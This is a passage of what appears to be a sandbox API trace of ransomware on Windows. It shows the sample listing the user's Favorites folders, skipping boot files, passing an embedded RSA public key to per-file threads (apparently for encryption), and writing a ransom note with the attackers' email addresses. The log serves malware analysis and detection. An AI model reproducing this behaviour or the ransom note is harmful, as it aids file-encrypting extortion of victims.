"c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0045.565] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54c [0045.565] WriteFile (in: hFile=0x54c, lpBuffer=0x17943c*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x179434, lpOverlapped=0x0 | out: lpBuffer=0x17943c*, lpNumberOfBytesWritten=0x179434*=0x2c4, lpOverlapped=0x0) returned 1 [0045.566] CloseHandle (hObject=0x54c) returned 1 [0045.566] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x42e4f90 [0045.566] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links") returned="Links" [0045.566] lstrcpyW (in: lpString1=0x17b644, lpString2="Links" | out: lpString1="Links") returned="Links" [0045.566] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0045.566] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.566] FindNextFileW (in: hFindFile=0x42e4f90, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0045.566] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0045.566] FindNextFileW (in: hFindFile=0x42e4f90, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0045.566] FindNextFileW (in: hFindFile=0x42e4f90, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0045.566] FindNextFileW (in: hFindFile=0x42e4f90, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0045.566] FindNextFileW (in: hFindFile=0x42e4f90, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0045.566] FindNextFileW (in: hFindFile=0x42e4f90, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0045.566] FindClose (in: hFindFile=0x42e4f90 | out: hFindFile=0x42e4f90) returned 1 [0045.566] FindClose (in: hFindFile=0x42e4f90 | out: hFindFile=0x42e4f90) returned 0 [0045.566] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0045.566] lstrcmpW (lpString1="Microsoft Websites", lpString2="..") returned 1 [0045.566] lstrcmpW (lpString1="Microsoft Websites", lpString2=".") returned 1 [0045.566] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" [0045.566] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" [0045.566] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpString2="Microsoft Websites" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" [0045.566] SetErrorMode (uMode=0x1) returned 0x1 [0045.566] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" [0045.566] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0045.567] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0045.567] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*.*" [0045.567] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x42e53d0 [0045.605] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites") returned="Microsoft Websites" [0045.605] lstrcpyW (in: lpString1=0x17b644, lpString2="Microsoft Websites" | out: lpString1="Microsoft Websites") returned="Microsoft Websites" [0045.605] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0045.605] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0045.605] lstrcmpW (lpString1="IE Add-on site.url", lpString2="..") returned 1 [0045.606] lstrcmpW (lpString1="IE Add-on site.url", lpString2=".") returned 1 [0045.606] StrStrW (lpFirst="IE Add-on site.url", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0045.606] StrStrW (lpFirst="IE Add-on site.url", lpSrch="ntldr") returned 0x0 [0045.606] StrStrW (lpFirst="IE Add-on site.url", lpSrch="NTLDR") returned 0x0 [0045.606] StrStrW (lpFirst="IE Add-on site.url", lpSrch="NTDETECT.COM") returned 0x0 [0045.606] StrStrW (lpFirst="IE Add-on site.url", lpSrch="ntdetect.com") returned 0x0 [0045.606] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch="Desktop") returned 0x0 [0045.606] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch="DESKTOP") returned 0x0 [0045.606] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned 63 [0045.606] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0045.606] lstrcpyW (in: lpString1=0x17be7c, lpString2="IE Add-on site.url" | out: lpString1="IE Add-on site.url") returned="IE Add-on site.url" [0045.606] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0045.606] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x548 [0045.606] Sleep (dwMilliseconds=0x96) [0045.751] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0045.751] lstrcmpW (lpString1="IE site on Microsoft.com.url", lpString2="..") returned 1 [0045.751] lstrcmpW (lpString1="IE site on Microsoft.com.url", lpString2=".") returned 1 [0045.751] StrStrW (lpFirst="IE site on Microsoft.com.url", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0045.751] StrStrW (lpFirst="IE site on Microsoft.com.url", lpSrch="ntldr") returned 0x0 [0045.751] StrStrW (lpFirst="IE site on Microsoft.com.url", lpSrch="NTLDR") returned 0x0 [0045.751] StrStrW (lpFirst="IE site on Microsoft.com.url", lpSrch="NTDETECT.COM") returned 0x0 [0045.751] StrStrW (lpFirst="IE site on Microsoft.com.url", lpSrch="ntdetect.com") returned 0x0 [0045.751] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch="Desktop") returned 0x0 [0045.751] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch="DESKTOP") returned 0x0 [0045.751] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned 63 [0045.751] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0045.751] lstrcpyW (in: lpString1=0x17be7c, lpString2="IE site on Microsoft.com.url" | out: lpString1="IE site on Microsoft.com.url") returned="IE site on Microsoft.com.url" [0045.751] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0045.751] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x558 [0045.751] Sleep (dwMilliseconds=0x96) [0045.918] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0045.918] lstrcmpW (lpString1="Microsoft At Home.url", lpString2="..") returned 1 [0045.918] lstrcmpW (lpString1="Microsoft At Home.url", lpString2=".") returned 1 [0045.918] StrStrW (lpFirst="Microsoft At Home.url", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0045.918] StrStrW (lpFirst="Microsoft At Home.url", lpSrch="ntldr") returned 0x0 [0045.918] StrStrW (lpFirst="Microsoft At Home.url", lpSrch="NTLDR") returned 0x0 [0045.918] StrStrW (lpFirst="Microsoft At Home.url", lpSrch="NTDETECT.COM") returned 0x0 [0045.918] StrStrW (lpFirst="Microsoft At Home.url", lpSrch="ntdetect.com") returned 0x0 [0045.918] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch="Desktop") returned 0x0 [0045.918] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch="DESKTOP") returned 0x0 [0045.918] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned 63 [0045.918] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0045.918] lstrcpyW (in: lpString1=0x17be7c, lpString2="Microsoft At Home.url" | out: lpString1="Microsoft At Home.url") returned="Microsoft At Home.url" [0045.918] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0045.918] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x550 [0045.918] Sleep (dwMilliseconds=0x96) [0046.087] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0046.087] lstrcmpW (lpString1="Microsoft At Work.url", lpString2="..") returned 1 [0046.087] lstrcmpW (lpString1="Microsoft At Work.url", lpString2=".") returned 1 [0046.087] StrStrW (lpFirst="Microsoft At Work.url", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0046.087] StrStrW (lpFirst="Microsoft At Work.url", lpSrch="ntldr") returned 0x0 [0046.087] StrStrW (lpFirst="Microsoft At Work.url", lpSrch="NTLDR") returned 0x0 [0046.087] StrStrW (lpFirst="Microsoft At Work.url", lpSrch="NTDETECT.COM") returned 0x0 [0046.087] StrStrW (lpFirst="Microsoft At Work.url", lpSrch="ntdetect.com") returned 0x0 [0046.087] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch="Desktop") returned 0x0 [0046.087] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch="DESKTOP") returned 0x0 [0046.087] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned 63 [0046.087] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0046.087] lstrcpyW (in: lpString1=0x17be7c, lpString2="Microsoft At Work.url" | out: lpString1="Microsoft At Work.url") returned="Microsoft At Work.url" [0046.087] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0046.087] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x560 [0046.088] Sleep (dwMilliseconds=0x96) [0046.244] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0046.244] lstrcmpW (lpString1="Microsoft Store.url", lpString2="..") returned 1 [0046.244] lstrcmpW (lpString1="Microsoft Store.url", lpString2=".") returned 1 [0046.244] StrStrW (lpFirst="Microsoft Store.url", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0046.244] StrStrW (lpFirst="Microsoft Store.url", lpSrch="ntldr") returned 0x0 [0046.244] StrStrW (lpFirst="Microsoft Store.url", lpSrch="NTLDR") returned 0x0 [0046.244] StrStrW (lpFirst="Microsoft Store.url", lpSrch="NTDETECT.COM") returned 0x0 [0046.244] StrStrW (lpFirst="Microsoft Store.url", lpSrch="ntdetect.com") returned 0x0 [0046.244] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch="Desktop") returned 0x0 [0046.244] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch="DESKTOP") returned 0x0 [0046.244] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned 63 [0046.244] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0046.244] lstrcpyW (in: lpString1=0x17be7c, lpString2="Microsoft Store.url" | out: lpString1="Microsoft Store.url") returned="Microsoft Store.url" [0046.244] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0046.245] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x564 [0046.245] Sleep (dwMilliseconds=0x96) [0046.408] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0046.409] FindClose (in: hFindFile=0x42e53d0 | out: hFindFile=0x42e53d0) returned 1 [0046.409] FindClose (in: hFindFile=0x42e53d0 | out: hFindFile=0x42e53d0) returned 0 [0046.409] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" [0046.409] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*.*" [0046.409] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch="Desktop") returned 0x0 [0046.409] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch="DESKTOP") returned 0x0 [0046.409] SetErrorMode (uMode=0x1) returned 0x1 [0046.409] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\_HELP_INSTRUCTION.TXT") returned 80 [0046.409] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0046.409] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0046.409] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0x568) returned 0x0 [0046.410] RegQueryValueExW (in: hKey=0x568, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3de3c98, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x3de3c98*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0046.410] RegCloseKey (hKey=0x568) returned 0x0 [0046.410] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0046.410] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0046.410] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0046.410] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0046.410] WriteFile (in: hFile=0x568, lpBuffer=0x17943c*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x179434, lpOverlapped=0x0 | out: lpBuffer=0x17943c*, lpNumberOfBytesWritten=0x179434*=0x2c4, lpOverlapped=0x0) returned 1 [0046.411] CloseHandle (hObject=0x568) returned 1 [0046.411] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x42e53d0 [0046.411] 